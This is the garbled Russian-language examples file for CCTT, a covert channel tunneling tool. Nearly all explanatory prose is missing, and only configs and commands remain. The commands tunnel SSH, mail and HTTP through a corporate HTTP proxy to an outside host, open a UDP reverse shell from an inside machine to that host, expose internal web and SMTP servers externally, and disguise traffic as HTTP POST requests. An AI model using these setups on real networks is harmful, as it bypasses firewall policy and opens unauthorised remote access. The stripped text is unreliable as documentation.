CCTT - Covert Channel Tunneling Tool v0.1.7 - EXAMPLES
Copyright (C) 2002,2003 Simon Castro - scastro@entreelibre.com
$Id: EXAMPLES_ru,v 1.6 2003/06/13 08:31:15 simsim Exp $

---

      CCTT -      (Covert Channel Tunneling Tool) v0.1.7 (C) Simon Castro.
  CCTT  ;     /     GNU General Public License  Free Software Foundation;   2-   (  )  .
  CCTT          ,     ;         .  GNU General Public License    .
       GNU General Public License   CCTT;    ,    Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA

---

          (   )    CCTT,        /    .

   I)     HTTP       .
  II)     UDP ''. 
 III)  HTTP /     CCTT. 
  IV)   CCTT       .
   V)    CCTT    .
  VI)  HTTP :   /  HTTP .
 VII)  HTTP :  ,     .
VIII)  HTTP :  ,   .

---

I)     HTTP       . 

  A]   

             : HTTP ...           TCP 443  CONNECT.
      ,   IP   : 192.168.1.1   : 8080 

  B]   CCTT

      ,    :
       * SSH     ,    (111.222.1.1).
       * SMTP    ISP smtp  (111.222.2.1).
       * POP    ISP pop  (111.222.2.2).

  C]  

           : 
       * SSH      .
       *   /   ISP smtp  pop .
       *     ( shell),   cctt.
       * Chroot  : jail
       *  ,            CCTT.
       
        (srv_exemple_1.cf)     :
       PROTOCOL=tcp
       IDENT=basic_ident
       IDENT_KEY=simsim
       SRV_SHELL_LOC=/usr/local/bin/false
       SRV_SHELL_CMD=false
       PROXY_MODE_LIST=ssh:127.0.0.1:22
       PROXY_MODE_LIST=smtp:111.222.2.1:25
       PROXY_MODE_LIST=pop:111.222.2.2:110
       PROXY_ONLY=ON
       PERM_USER_GROUP=cctt
       PERM_CHROOT=cage
 
            : 
     
       cl_exemple_1_ssh.cf :
	PROTOCOL=tcp
        CHANNEL_PROXY_IP=192.168.1.1
        CHANNEL_PROXY_PORT=8080
        CHANNEL_PROXY_PROT=tcp
	CHANNEL_PROXY_DEL=30000
        IDENT=basic_ident
        IDENT_KEY=simsim
        PROXY_MODE_LOCAL_IP=127.0.0.1
        PROXY_MODE_LOCAL_PORT=4222
        PROXY_MODE_PROT=tcp
        PROXY_MODE_REMOTE_IP=127.0.0.1
        PROXY_MODE_REMOTE_PORT=22

       cl_exemple_1_smtp.cf :
	PROTOCOL=tcp
        CHANNEL_PROXY_IP=192.168.1.1
        CHANNEL_PROXY_PORT=8080
        CHANNEL_PROXY_PROT=tcp
	CHANNEL_PROXY_DEL=30000
        IDENT=basic_ident
        IDENT_KEY=simsim
        PROXY_MODE_LOCAL_IP=127.0.0.1
        PROXY_MODE_LOCAL_PORT=4225
        PROXY_MODE_PROT=tcp
        PROXY_MODE_REMOTE_IP=111.222.2.1
        PROXY_MODE_REMOTE_PORT=25

       cl_exemple_1_pop.cf :
	PROTOCOL=tcp
        CHANNEL_PROXY_IP=192.168.1.1
        CHANNEL_PROXY_PORT=8080
        CHANNEL_PROXY_PROT=tcp
	CHANNEL_PROXY_DEL=30000
        IDENT=basic_ident
        IDENT_KEY=simsim
        PROXY_MODE_LOCAL_IP=127.0.0.1
        PROXY_MODE_LOCAL_PORT=42110
        PROXY_MODE_PROT=tcp
        PROXY_MODE_REMOTE_IP=111.222.2.2
        PROXY_MODE_REMOTE_PORT=110

  D]      CCTT

        (root ) : 
      cctt -s 111.222.1.1 -p 443 -f srv_exemple_1.cf -t socket_encode -L -v &

        ( ) : 
      cctt -c 111.222.1.1 -d 443 -f cl_exemple_1_ssh.cf -t socket_http_proxy_encode -a &
      cctt -c 111.222.1.1 -d 443 -f cl_exemple_1_smtp.cf -t socket_http_proxy_encode -a &
      cctt -c 111.222.1.1 -d 443 -f cl_exemple_1_pop.cf -t socket_http_proxy_encode -a &

        3 TCP         :
      *  4222           SSH.
      *  4225       ISP Smtp .
      *  42110       ISP Pop .

    CCTT         ,    'cage'      Syslogd.

---

II)     UDP ''.

  A]   

                              ,  UDP  7272.

  B]   CCTT

       UDP       (111.222.1.1:7272)    reverse-shell,             .

  C]  

          :
      *   / UDP    7272.
      *     ( shell),   cctt.
      * Chroot  : jail.
      *  ,           CCTT.

       (srv_exemple_2.cf)     :
      PROTOCOL=udp
      IDENT=basic_ident
      IDENT_KEY=simsim
      SRV_SHELL_LOC=/usr/bin/false
      SRV_SHELL_CMD=false
      PERM_USER_GROUP=cctt
      PERM_CHROOT=cage

       (cl_exemple_2.cf)     :
      PROTOCOL=udp
      IDENT=basic_ident
      IDENT_KEY=simsim

  D]      CCTT

        (root ) : 
      cctt -s 111.222.1.1 -p 7272 -f srv_exemple_2.cf -t socket_encode -l &

        ( ) : 
      cctt -c 111.222.1.1 -d 7272 -f cl_exemple_2.cf -t socket_encode -r &
 
    ,     ,            . Shell    logfile.

---

III)  HTTP /     CCTT.

  A]   .

             I) ,         .           . 
      IP  HTTP  : 192.168.1.1   : 8080.        CONNECT.

  B]   CCTT

       /          .
       ,       SSL,            .

  C]  

          :
      *   /   ISP smtp  pop .
      *     ( shell),   cctt.
      * Chroot  : jail
      *  ,           CCTT.

       (srv_exemple_3.cf)     :
      PROTOCOL=tcp
      IDENT=basic_ident
      IDENT_KEY=simsim
      SRV_SHELL_LOC=/usr/local/bin/false
      SRV_SHELL_CMD=false
      PROXY_MODE_LIST=http:111.222.7.7:80
      PROXY_ONLY=ON
      PERM_USER_GROUP=cctt
      PERM_CHROOT=cage

       (cl_exemple_3.cf)     :
      PROTOCOL=tcp
      CHANNEL_PROXY_IP=192.168.1.1
      CHANNEL_PROXY_PORT=8080
      CHANNEL_PROXY_PROT=tcp
      CHANNEL_PROXY_DEL=30000
      IDENT=basic_ident
      IDENT_KEY=simsim
      PROXY_MODE_LOCAL_IP=127.0.0.1
      PROXY_MODE_LOCAL_PORT=4280
      PROXY_MODE_PROT=tcp
      PROXY_MODE_REMOTE_IP=111.222.7.7
      PROXY_MODE_REMOTE_PORT=80

  D]      CCTT

        (root ) : 
      cctt -s 111.222.1.1 -p 443 -f srv_exemple_3.cf -t socket_encode -L -v &

        ( ) : 
      cctt -c 111.222.1.1 -d 443 -f cl_exemple_3.cf -t socket_http_proxy_encode -a &

           HTTP    127.0.0.1:4280  HTTP      (       IP )    ''  CCTT.

---

IV)   CCTT       .

  A]   

         I),      .
      IP     HTTP     (192.168.1.1:8080).
      IP   HTTP   ,   HTTP CONNECT (111.111.1.1:8080  222.222.2.2:8080).
     ,   3      TCP  443  8080.

  B]   CCTT

      SSH        (111.222.1.1:443).
        SSHd,    ,    : '      ' :)

  C]  

       (cl_exemple_4.cf)     :
      PROTOCOL=tcp
      CHANNEL_PROXY_IP=192.168.1.1
      CHANNEL_PROXY_PORT=8080
      CHANNEL_PROXY_PROT=tcp
      CHANNEL_PROXY_DEL=25000
      HTTP_PROXY_CHAIN=111.111.1.1:8080:25000;222.222.2.2:8080:25000
      PROXY_MODE_LOCAL_IP=127.0.0.1
      PROXY_MODE_LOCAL_PORT=4222
      PROXY_MODE_PROT=tcp
      ###    ,      
      IDENT=basic_ident
      IDENT_KEY=simsim
      PROXY_MODE_REMOTE_IP=127.0.0.1
      PROXY_MODE_REMOTE_PORT=22

  D]      CCTT 

        ( ) :
      cctt -c 111.222.1.1 -d 443 -f cl_exemple_4.cf -t client_only_with_http_proxy &

         CCTT,   localhost:4222.
        TCP ,      HTTP ,     ,     SSHd.
      ,    TCP      .

---

V)    CCTT    .

  A]   

             I),        .         .
      IP  HTTP  : 192.168.1.1   : 8080.   ,     CONNECT.

  B]   CCTT

              (192.168.2.1:80)  SMTP  (192.168.2.2:25)   .
          (W1  W2)         (S)   SMTP    CCTT     (C - 111.222.1.1:443)   .

  C]  

       (srv_exemple_5.cf)     :
      PROTOCOL=tcp
      IDENT=basic_ident
      IDENT_KEY=simsim
      SRV_SHELL_LOC=/usr/local/bin/false
      SRV_SHELL_CMD=false
      PROXY_ONLY=ON
      PERM_USER_GROUP=cctt
      PERM_CHROOT=cage

       ,      (cl_Wint_exemple_5.cf),     :
      PROTOCOL=tcp
      IDENT=basic_ident
      IDENT_KEY=simsim
      CHANNEL_PROXY_IP=192.168.1.1
      CHANNEL_PROXY_PORT=8080
      CHANNEL_PROXY_PROT=tcp
      CHANNEL_PROXY_DEL=15000
      PROXY_MODE_PROT=tcp
      PROXY_MODE_REMOTE_IP=192.168.2.1
      PROXY_MODE_REMOTE_PORT=80

       ,    SMTP  (cl_Sint_exemple_5.cf),     :
      PROTOCOL=tcp
      IDENT=basic_ident
      IDENT_KEY=simsim
      CHANNEL_PROXY_IP=192.168.1.1
      CHANNEL_PROXY_PORT=8080
      CHANNEL_PROXY_PROT=tcp
      CHANNEL_PROXY_DEL=15000
      PROXY_MODE_PROT=tcp
      PROXY_MODE_REMOTE_IP=192.168.2.2
      PROXY_MODE_REMOTE_PORT=25

         ,      (cl_Wext_exemple_5.cf),     :
      PROTOCOL=tcp
      IDENT=basic_ident
      IDENT_KEY=simsim
      PROXY_MODE_LOCAL_IP=@IP_W1
      PROXY_MODE_LOCAL_PORT=4280
      PROXY_MODE_PROT=tcp
      PROXY_MODE_REMOTE_IP=192.168.2.1
      PROXY_MODE_REMOTE_PORT=80

         ,    SMTP  (cl_Sext_exemple_5.cf),     :
      PROTOCOL=tcp
      IDENT=basic_ident
      IDENT_KEY=simsim
      PROXY_MODE_LOCAL_IP=@IP_S
      PROXY_MODE_LOCAL_PORT=4225
      PROXY_MODE_PROT=tcp
      PROXY_MODE_REMOTE_IP=192.168.2.2
      PROXY_MODE_REMOTE_PORT=25

  D]      CCTT

        (  root) : 
      cctt -s 111.222.1.1 -p 443 -f srv_exemple_5.cf -t socket -L -v &

         CCTT      :
      cctt -c 111.222.1.1 -d 443 -f cl_Wint_exemple_5.cf -t socket_http_proxy -z &
      cctt -c 111.222.1.1 -d 443 -f cl_Sint_exemple_5.cf -t socket_http_proxy -z &

    =>    CCTT     CCTT  -             SMTP     .

    : CCTT      ,     ,      .

       CCTT        :
       W1,  : cctt -c 111.222.1.1 -d 443 -f cl_Wext_exemple_5.cf -t socket -a &
       S,   : cctt -c 111.222.1.1 -d 443 -f cl_Sext_exemple_5.cf -t socket -a &

    =>        

           :          @IP_W1:4280,    @IP_S:4225     SMTP .
         SMTP  :
      *     @IP_S:4225.
      *  CCTT S    CCTT  C     SMTP .
      * CCTT    ,      CCTT         .
      *  CCTT     ,    SMTP      . 

            SMTP ,        .

---

VI)  HTTP :   /  HTTP .

      doc/confs/http_post1.
  .      .

  A]   

       ,     HTTP POST          HTTP .

  B]   CCTT

      HTTP CCTT    HTTP POST    ,      .
        CCTT            .
       HTTP     , CCTT     ,     CCTT.

            .

---

VII)  HTTP :  ,     .

      doc/confs/http_post1.
  .      .

  A]   

       ,     HTTP POST          HTTP .

  B]   CCTT

      CCTT      VI ,          CCTT.
           ( , GET /index.html HTTP/1.0),     ,      ,   .
         HTML   .

---

VIII)  HTTP :  ,   .

      doc/confs/http_post2.
  .      .

  A]   

       ,     HTTP POST          HTTP .

  B]   CCTT

    CCTT   HTTP              .
           HTTP POST    HTTP  .
      HTTP         doc/confs/http_post2/snort_capture.txt.

---